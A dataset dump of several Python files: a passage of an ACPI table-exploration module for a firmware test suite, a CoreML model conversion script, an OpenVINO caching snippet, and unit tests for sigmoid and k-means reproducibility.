def parse_tsd(dependencies):
"""Parse T-State Dependency"""
return _TSD_factory(len(dependencies))(dependencies)
def _TSS_factory(num_tstates):
class TState(bits.cdata.Struct):
"""Throttling Supported States"""
_pack_ = 1
_fields_ = [
('percent', ctypes.c_uint32),
('power', ctypes.c_uint32),
('latency', ctypes.c_uint32),
('control', ctypes.c_uint32),
('status', ctypes.c_uint32),
]
_formats = {
'percent': lambda x: "{}%".format(x),
'power': lambda x: "{} mW".format(x),
'latency': lambda x: "{} us".format(x),
}
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class _TSS(bits.cdata.Struct):
_pack = 1
_fields_ = [
('TStates', TState * num_tstates),
]
return _TSS
def parse_tss(tss_data):
"""Parse Throttling Supported States"""
return _TSS_factory(len(tss_data))(tss_data)
def display_uid():
"""Find and display _UID"""
def print_uid(uid):
print "_UID = %s" % uid
display_acpi_method("_UID", print_uid)
_acpica_early_init = CFUNCTYPE(c_bool)(_acpi.acpica_early_init)
_acpica_init = CFUNCTYPE(c_bool)(_acpi.acpica_init)
def needs_early_init(f, docstring=""):
"""Wrap a function that requires minimal ACPICA table-parsing initialization"""
def acpica_early_init_wrapper(*args):
if not _acpica_early_init():
raise RuntimeError("ACPICA module failed minimal initialization.")
return f(*args)
acpica_early_init_wrapper.__doc__ = docstring
return acpica_early_init_wrapper
def needs_init(f, docstring=""):
"""Wrap a function that requires ACPICA initialization"""
def acpica_init_wrapper(*args):
if not _acpica_init():
raise RuntimeError("ACPICA module failed to initialize.")
return f(*args)
acpica_init_wrapper.__doc__ = docstring
return acpica_init_wrapper
AE_OK = 0
AE_BAD_PARAMETER = 0x1001
ACPI_HANDLE = c_void_p
ACPI_IO_ADDRESS = c_ulong
ACPI_OBJECT_TYPE = c_uint32
ACPI_SIZE = c_ulong
ACPI_STATUS = c_uint32
ACPI_STRING = c_char_p
UINT32 = c_uint32
ACPI_ALLOCATE_BUFFER = ACPI_SIZE(-1)
ACPI_ROOT_OBJECT = ACPI_HANDLE(-1)
ACPI_FULL_PATHNAME, ACPI_SINGLE_NAME = range(2)
class ACPI_BUFFER(bits.cdata.Struct):
_fields_ = (
("Length", ACPI_SIZE),
("Pointer", c_void_p),
)
ACPI_WALK_CALLBACK = CFUNCTYPE(ACPI_STATUS, ACPI_HANDLE, UINT32, c_void_p, POINTER(c_void_p))
terminate = CFUNCTYPE(None)(_acpi.acpica_terminate)
ACPI_FREE = CFUNCTYPE(None, c_void_p)(_acpi.ACPI_FREE)
AcpiFormatException = CFUNCTYPE(POINTER(c_char), ACPI_STATUS)(_acpi.AcpiFormatException)
class ACPIException(Exception):
def __str__(self):
s = string_at(AcpiFormatException(self.args[0]))
return "[Error {:#x}] {}".format(self.args[0], s)
def check_status(status):
"""Check an ACPI_STATUS value, and raise an exception if not successful
To check non-status values that may have the error bit set, use check_error_value instead."""
if status:
raise ACPIException(status)
acpi_unsafe_io = True
@CFUNCTYPE(ACPI_STATUS, ACPI_IO_ADDRESS, POINTER(UINT32), UINT32)
def AcpiOsReadPort(Address, Value, Width):
if Width == 8:
Value.contents.value = bits.inb(Address) if acpi_unsafe_io else 0xFF
elif Width == 16:
Value.contents.value = bits.inw(Address) if acpi_unsafe_io else 0xFFFF
elif Width == 32:
Value.contents.value = bits.inl(Address) if acpi_unsafe_io else 0xFFFFFFFF
else:
return AE_BAD_PARAMETER
return AE_OK
@CFUNCTYPE(ACPI_STATUS, ACPI_IO_ADDRESS, UINT32, UINT32)
def AcpiOsWritePort(Address, Value, Width):
if not acpi_unsafe_io:
return AE_OK
if Width == 8:
bits.outb(Address, Value)
elif Width == 16:
bits.outw(Address, Value)
elif Width == 32:
bits.outl(Address, Value)
else:
return AE_BAD_PARAMETER
return AE_OK
bits.set_func_ptr(_acpi.AcpiOsReadPort_ptrptr, AcpiOsReadPort)
bits.set_func_ptr(_acpi.AcpiOsWritePort_ptrptr, AcpiOsWritePort)
_AcpiGetHandle_docstring = """Get the object handle associated with an ACPI name"""
AcpiGetHandle = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_HANDLE, ACPI_STRING, POINTER(ACPI_HANDLE))(_acpi.AcpiGetHandle), _AcpiGetHandle_docstring)
_AcpiGetName_docstring = """Get the name of an ACPI object"""
AcpiGetName = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_HANDLE, UINT32, POINTER(ACPI_BUFFER))(_acpi.AcpiGetName), _AcpiGetName_docstring)
_AcpiGetObjectInfo_docstring = """Get info about an ACPI object"""
AcpiGetObjectInfo = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_HANDLE, POINTER(c_void_p))(_acpi.AcpiGetObjectInfo), _AcpiGetObjectInfo_docstring)
_AcpiGetTable_docstring = """Return table specified by the signature and instance"""
AcpiGetTable = needs_early_init(CFUNCTYPE(ACPI_STATUS, ACPI_STRING, UINT32, POINTER(POINTER(TableHeader)))(_acpi.AcpiGetTable), _AcpiGetTable_docstring)
_AcpiGetTableByIndex_docstring = """Return table specified by index"""
AcpiGetTableByIndex = needs_early_init(CFUNCTYPE(ACPI_STATUS, UINT32, POINTER(POINTER(TableHeader)))(_acpi.AcpiGetTableByIndex), _AcpiGetTableByIndex_docstring)
_AcpiOsGetRootPointer_docstring = """Return the address of the ACPI RSDP table"""
AcpiOsGetRootPointer = needs_init(CFUNCTYPE(c_ulong)(_acpi.AcpiOsGetRootPointer), _AcpiOsGetRootPointer_docstring)
_AcpiInstallInterface_docstring = """Install an interface into the _OSI method"""
AcpiInstallInterface = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_STRING)(_acpi.AcpiInstallInterface), _AcpiInstallInterface_docstring)
_AcpiLoadTable_docstring = """Load an SSDT table binary into the ACPI namespace"""
AcpiLoadTable = needs_init(CFUNCTYPE(ACPI_STATUS, POINTER(TableHeader))(_acpi.AcpiLoadTable), _AcpiLoadTable_docstring)
_AcpiRemoveInterface_docstring = """Remove an interface from the _OSI method."""
AcpiRemoveInterface = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_STRING)(_acpi.AcpiRemoveInterface), _AcpiRemoveInterface_docstring)
_AcpiSubsystemStatus_docstring = """Get ACPI subsystem status"""
AcpiSubsystemStatus = needs_init(CFUNCTYPE(ACPI_STATUS)(_acpi.AcpiSubsystemStatus), _AcpiSubsystemStatus_docstring)
_AcpiWalkNamespace_docstring = """Walk the ACPI namespace with callbacks"""
AcpiWalkNamespace = needs_init(CFUNCTYPE(ACPI_STATUS, ACPI_OBJECT_TYPE, ACPI_HANDLE, UINT32, ACPI_WALK_CALLBACK, ACPI_WALK_CALLBACK, c_void_p, POINTER(c_void_p))(_acpi.AcpiWalkNamespace), _AcpiWalkNamespace_docstring)
def get_object_info(pathname):
"""Get object information for an ACPI object."""
handle = ACPI_HANDLE()
check_status(AcpiGetHandle(None, pathname, byref(handle)))
assert handle
info = c_void_p()
check_status(AcpiGetObjectInfo(handle, byref(info)))
assert info
try:
length = c_uint32.from_address(info.value).value
buf = create_string_buffer(length)
memmove(buf, info, length)
finally:
ACPI_FREE(info)
return ObjectInfo(buf.raw, info.value)
def get_objpaths(objectname, depth=(2**32-1)):
"""Return a list of names of ACPI objects matching objectname
If depth is specified, search only that deep in the namespace."""
l = []
@ACPI_WALK_CALLBACK
def callback(handle, nesting_level, context, return_value):
buf = ACPI_BUFFER(ACPI_ALLOCATE_BUFFER, None)
status = AcpiGetName(handle, ACPI_FULL_PATHNAME, byref(buf))
if status:
print "AcpiGetName:", ACPIException(status)
return 0
name = string_at(buf.Pointer)
ACPI_FREE(buf.Pointer)
if objectname in name:
l.append(name)
return 0
null_callback = ACPI_WALK_CALLBACK(0)
check_status(AcpiWalkNamespace(ACPI_TYPE_ANY, ACPI_ROOT_OBJECT, depth, callback, null_callback, None, None))
return l
def install_interface(name):
check_status(AcpiInstallInterface(name))
def get_rsdt_addr():
"""Return the address of the RSDT"""
return RSDP(AcpiOsGetRootPointer()).rsdt_address
def get_xsdt_addr():
"""Return the address of the XSDT
Returns None if the RSDP does not point to an XSDT, or if the XSDT lives
above 4GB when running in 32-bit mode."""
rsdp = RSDP(AcpiOsGetRootPointer())
try:
xsdt = rsdp.xsdt_address
except AttributeError as e:
return None
if sizeof(c_void_p) == 4 and xsdt >= 2**32:
raise RuntimeError("XSDT located above 4G; cannot access on 32-bit")
return xsdt
def get_table(signature, instance=1):
"""Get the requested ACPI table based on signature"""
if signature in ('RSDP', 'RSD PTR', 'RSD PTR '):
if instance == 1:
rsdp_addr = AcpiOsGetRootPointer()
rsdp = RSDP(rsdp_addr)
return string_at(rsdp_addr, sizeof(rsdp))
return None
addr = get_table_addr(signature, instance)
if addr is None:
return None
header = TableHeader.from_address(addr)
return string_at(addr, header.length)
def get_table_addr(signature, instance=1):
"""Get the requested ACPI table address based on signature"""
special_get = {
'RSDP': AcpiOsGetRootPointer,
'RSD PTR': AcpiOsGetRootPointer,
'RSD PTR ': AcpiOsGetRootPointer,
'RSDT': get_rsdt_addr,
'XSDT': get_xsdt_addr,
}.get(signature)
if special_get is not None:
if instance == 1:
return special_get()
return None
header = POINTER(TableHeader)()
if AcpiGetTable(signature, instance, byref(header)):
return None
return addressof(header.contents)
def get_table_by_index(index):
"""Get ACPI table based on an index in the root table"""
header = POINTER(TableHeader)()
if AcpiGetTableByIndex(index, byref(header)):
return None
return string_at(addressof(header.contents), header.contents.length)
def get_table_addr_by_index(index):
"""Get ACPI table address based on an index in the root table"""
header = POINTER(TableHeader)()
if AcpiGetTableByIndex(index, byref(header)):
return None
return addressof(header.contents)
def get_table_list():
"""Get the list of ACPI table signatures"""
tableptrs = itertools.chain(itertools.ifilter(bool, (get_table_addr_by_index(index) for index in range(3))),
itertools.takewhile(bool, (get_table_addr_by_index(index) for index in itertools.count(start=3))))
signatures = [(ctypes.c_char * 4).from_address(ptr).value for ptr in tableptrs]
signatures.extend([s for s in ['RSDP', 'RSDT', 'XSDT'] if get_table_addr(s)])
signatures = sorted(set(signatures))
return signatures
def load_table(table_data):
"""Load an SSDT table binary into the ACPI namespace
Usage: acpi.load_table(table_data) where table_data contains an ACPI SSDT
(including header). The contents of the SSDT can be used to either patch
existing or add new ACPI methods or data for debug purposes.
Example usage steps:
- Create an SSDT ASL source file.
- Compile to generate a binary image (AML) file.
- Include the SSDT's AML binary file on the BITS disk or ISO image.
- Load the SSDT AML binary file into the ACPI namespace, with:
acpi.load_table(open("/ssdt.aml").read())"""
buf = create_string_buffer(table_data, len(table_data))
check_status(AcpiLoadTable(cast(buf, POINTER(TableHeader))))
def display_objects(name="\\", depth=0xffffffff):
s = ""
for path in get_objpaths(name, depth):
s += "{} ({})\n".format(path, acpi_object_types.get(get_object_info(path).object_type, "Reserved"))
ttypager.ttypager_wrap(s, indent=False)
def dump(name="", depth=0xffffffff):
s = ''
for path in get_objpaths(name, depth):
s += ttypager._wrap('{} : {!r}'.format(path, evaluate(path))) + '\n'
return s
def dumptable(name="", instance=1):
"""Dump hexadecimal and printable ASCII bytes for an ACPI table specified by 4CC and instance"""
s = ''
data = get_table(name, instance)
if data is None:
s += "ACPI table with signature of {} and instance of {} not found.\n".format(name, instance)
return s
s += bits.dumpmem(data)
return s
def dumptables():
"""Dump hexdecimal and printable ASCII bytes for all ACPI tables"""
s = ''
for signature in get_table_list():
for instance in itertools.count(1):
data = get_table(signature, instance)
if data is None:
break
s += "ACPI Table {} instance {}\n".format(signature, instance)
s += bits.dumpmem(data)
return s
created_explore_acpi_tables_cfg = False
def create_explore_acpi_tables_cfg():
global created_explore_acpi_tables_cfg
if created_explore_acpi_tables_cfg:
return
cfg = ""
try:
import efi
cfg += 'menuentry "Save all ACPI tables (raw and decoded) to files" {\n'
cfg += ' echo "Saving all ACPI tables (raw and decoded) to files..."\n'
cfg += " py 'import acpi'\n"
cfg += " py 'acpi.efi_save_tables()'\n"
cfg += ' echo "Done."\n'
cfg += " py 'from bits import pause ; pause.pause()'\n"
cfg += '}\n\n'
cfg += 'menuentry "Save all ACPI tables (raw only) to files" {\n'
cfg += ' echo "Saving all ACPI tables (raw only) to files..."\n'
cfg += " py 'import acpi'\n"
cfg += " py 'acpi.efi_save_tables(decode=False)'\n"
cfg += ' echo "Done."\n'
cfg += " py 'from bits import pause ; pause.pause()'\n"
cfg += '}\n\n'
except:
cfg += 'menuentry "Dump all ACPI tables to log only" {\n'
cfg += ' echo "Dumping ACPI tables to log..."\n'
cfg += " py 'import acpi, bits, redirect'\n"
cfg += " py 'with redirect.logonly(): print acpi.dumptables()'\n"
cfg += ' echo "Done."\n'
cfg += " py 'from bits import pause ; pause.pause()'\n"
cfg += '}\n\n'
for signature in get_table_list():
for instance in itertools.count(1):
if get_table_addr(signature, instance) is None:
break
parse_method = 'parse_{}'.format(string.rstrip(str.lower(signature),"!"), instance)
if parse_method in globals():
cfg += 'menuentry "Decode {} Instance {}" {{\n'.format(signature, instance)
cfg += ' py "import acpi ; acpi.{}(printflag=True, instance={})"\n'.format(parse_method, instance)
cfg += '}\n\n'
if signature in ("APIC", "SRAT"):
cfg += 'menuentry "Decode {} Instance {} (enabled only)" {{\n'.format(signature, instance)
cfg += ' py "import acpi ; acpi.{}(EnabledOnly=True, instance={})"\n'.format(parse_method, instance)
cfg += '}\n\n'
cfg += 'menuentry "Dump {} Instance {} raw" {{\n'.format(signature, instance)
cfg += """ py 'import ttypager, acpi; ttypager.ttypager(acpi.dumptable("{}", {}))'\n""".format(signature, instance)
cfg += '}\n'
bits.pyfs.add_static("explore_acpi_tables.cfg", cfg)
created_explore_acpi_tables_cfg = True
created_explore_acpi_cpu_methods_cfg = False
def create_explore_acpi_cpu_methods_cfg():
global created_explore_acpi_cpu_methods_cfg
if created_explore_acpi_cpu_methods_cfg:
return
methods = set()
for c in get_cpupaths():
for o in get_objpaths(c + "."):
method = o[len(c)+1:]
if "." in method:
continue
methods.add(method)
cfg = ""
for method in sorted(methods):
# Whitelist for now until splitting this into its own module
if method in ("_CSD", "_CST", "_MAT", "PDL", "_PPC", "_PCT", "_PTC", "_PSD", "_PSS", "_TDL", "_TPC", "_TSD", "_TSS"):
parse_method = 'parse' + string.lower(method)
cfg += 'menuentry "{} ({})" {{\n'.format(method, globals()[parse_method].__doc__)
cfg += """ py 'import acpi ; acpi.display_cpu_method("{}")'\n""".format(method)
cfg += '}\n'
bits.pyfs.add_static("explore_acpi_cpu_methods.cfg", cfg)
created_explore_acpi_cpu_methods_cfg = True
def show_checksum(signature, instance=1):
"""Compute checksum of ACPI table"""
data = get_table(signature, instance)
if data is None:
print "ACPI table with signature of {} and instance of {} not found.\n".format(signature, instance)
return
csum = sum(ord(c) for c in data)
print 'Full checksum is {:#x}'.format(csum)
print '1-byte checksum is {:#x}'.format(csum & 0xff)
try:
import efi
def efi_save_tables(decode=True):
"""Save all ACPI tables to files; only works under EFI.
Warning: All files in the /acpi directory will be deleted!"""
root = efi.get_boot_fs()
acpidir = root.mkdir("acpi")
# delete all files in \acpi directory
if "acpi" in os.listdir("/"):
print "Deleting old files..."
for f in os.listdir("/acpi"):
print "Deleting {}...".format(f),
acpidir.open(f, efi.EFI_FILE_MODE_READ | efi.EFI_FILE_MODE_WRITE).delete()
print "Done"
address_list = ''
for signature in get_table_list():
for instance in itertools.count(1):
data = get_table(signature, instance)
if data is None:
break
basename = signature
if instance > 1:
basename += "{}".format(instance)
fname = "{}.bin".format(basename)
print "Saving {}...".format(fname),
acpidir.create(fname).write(data)
print "Done"
address = get_table_addr(signature, instance)
address_list += "{:5}: {:#x}\n".format(basename, address)
parse_method = 'parse_{}'.format(string.rstrip(str.lower(signature),"!"), instance)
if (decode == True) and (parse_method in globals()):
data = "{} address = {:#x}\n".format(basename, address)
data += str(parse_table(signature, instance))
fname = "{}.txt".format(basename)
print "Saving {}...".format(fname),
acpidir.create(fname).write(data)
print "Done"
fname = "address_list.txt"
print "Saving {}...".format(fname),
acpidir.create(fname).write(address_list)
print "Done"
except:
pass
def save_tables_object_format():
"""Save all ACPI tables to a single file.
The origin is the physical address shifted right by 2 bits. Origins
dont need to be in order and the length of any data block is
arbitrary. The address shift by 2 requires all memory data dumps
start on a 4-byte boundary and the 32-bit data blocks require a
4-byte ending alignment. This may force data from before the actual
table start and data beyond the actual table end."""
def dumpmem_dwords(mem):
"""Dump hexadecimal dwords for a memory buffer"""
s = ''
for chunk in bits.grouper(16, mem):
for dword in bits.grouper(4, chunk):
s += "".join(" " if x is None else "{:02x}".format(ord(x)) for x in reversed(dword))
s += " "
s += '\n'
return s
details = ''
data_list = ''
for signature in get_table_list():
for instance in itertools.count(1):
data = get_table(signature, instance)
if data is None:
break
basename = signature
if instance > 1:
basename += "{}".format(instance)
address = get_table_addr(signature, instance)
addr_adjust = address % 4
len_adjust = (len(data) + addr_adjust) % 4
if len_adjust:
len_adjust = 4 - len_adjust
if addr_adjust or len_adjust:
# Data is not aligned on dword boundary or len is not multiple of dwords
new_address = address - addr_adjust
new_length = len(data) + len_adjust
if addr_adjust:
print "Address modified from {} to {}".format(address, new_address)
if len_adjust:
print "Length modified from {} to {}".format(len(data), new_length)
data = bits.memory(new_address, new_length)
address = new_address
details += "{:5}: address={:#x}, address>>2={:#x}, len={}, len/4={}\n".format(basename, address, address>>2, len(data), len(data)/4)
print "Saving {}...".format(basename),
data_list += "/origin {:x}\n".format(address >> 2)
data_list += dumpmem_dwords(data)
print "Done"
data_list += "/eof\n"
fname = "acpi_memory.txt"
print "Saving {}...".format(fname),
bits.pyfs.add_static(fname, data_list)
print "Done"
fname = "acpi_details.txt"
print "Saving {}...".format(fname),
bits.pyfs.add_static(fname, details)
print "Done"
with ttypager.page():
print "The following files have been created:"
print " (python)/acpi_details.txt -- the ACPI table details."
print " (python)/acpi_memory.txt -- the ACPI table memory dump."
print
print open("(python)/acpi_details.txt").read()
print
print open("(python)/acpi_memory.txt").read()
|
057_BiSeNetV2/02_celebamaskhq/01_float32/08_saved_model_to_coreml.py
|
IgiArdiyanto/PINTO_model_zoo
| 1,529 |
117340
|
<gh_stars>1000+
### tensorflow==2.3.0
import tensorflow as tf
import coremltools as ct
mlmodel = ct.convert('saved_model_256x256', source='tensorflow')
mlmodel.save("bisenetv2_celebamaskhq_256x256_float32.mlmodel")
mlmodel = ct.convert('saved_model_448x448', source='tensorflow')
mlmodel.save("bisenetv2_celebamaskhq_448x448_float32.mlmodel")
mlmodel = ct.convert('saved_model_480x640', source='tensorflow')
mlmodel.save("bisenetv2_celebamaskhq_480x640_float32.mlmodel")
|
docs/snippets/ov_caching.py
|
kurylo/openvino
| 1,127 |
117351
|
<filename>docs/snippets/ov_caching.py
# Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
from openvino.runtime import Core
device_name = 'GNA'
xml_path = '/tmp/myModel.xml'
# ! [ov:caching:part0]
core = Core()
core.set_property({'CACHE_DIR': '/path/to/cache/dir'})
model = core.read_model(model=xml_path)
compiled_model = core.compile_model(model=model, device_name=device_name)
# ! [ov:caching:part0]
assert compiled_model
# ! [ov:caching:part1]
core = Core()
compiled_model = core.compile_model(model_path=xml_path, device_name=device_name)
# ! [ov:caching:part1]
assert compiled_model
# ! [ov:caching:part2]
core = Core()
core.set_property({'CACHE_DIR': '/path/to/cache/dir'})
compiled_model = core.compile_model(model_path=xml_path, device_name=device_name)
# ! [ov:caching:part2]
assert compiled_model
# ! [ov:caching:part3]
# Find 'EXPORT_IMPORT' capability in supported capabilities
caching_supported = 'EXPORT_IMPORT' in core.get_property(device_name, 'OPTIMIZATION_CAPABILITIES')
# ! [ov:caching:part3]
|
06_reproducibility/test_sigmoid.py
|
fanchi/ml-design-patterns
| 1,149 |
117361
|
<reponame>fanchi/ml-design-patterns<gh_stars>1000+
#!/usr/bin/env python3
import unittest
import numpy as np
def sigmoid(x):
return 1.0 / (1 + np.exp(-x))
class TestSigmoid(unittest.TestCase):
def test_zero(self):
self.assertAlmostEqual(sigmoid(0), 0.5)
def test_neginf(self):
self.assertAlmostEqual(sigmoid(float("-inf")), 0)
def test_inf(self):
self.assertAlmostEqual(sigmoid(float("inf")), 1)
def cluster_kmeans(X):
from sklearn import cluster
k_means = cluster.KMeans(n_clusters=10, random_state=10)
labels = k_means.fit(X).labels_[::]
#print(labels)
return labels
class TestKMeans(unittest.TestCase):
def test_clustering(self):
from sklearn import cluster, datasets
X, _ = datasets.load_boston(return_X_y=True)
initial_result = cluster_kmeans(X)
for x in range(0, 10):
self.assertTrue(np.all(cluster_kmeans(X) == initial_result))
if __name__ == '__main__':
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.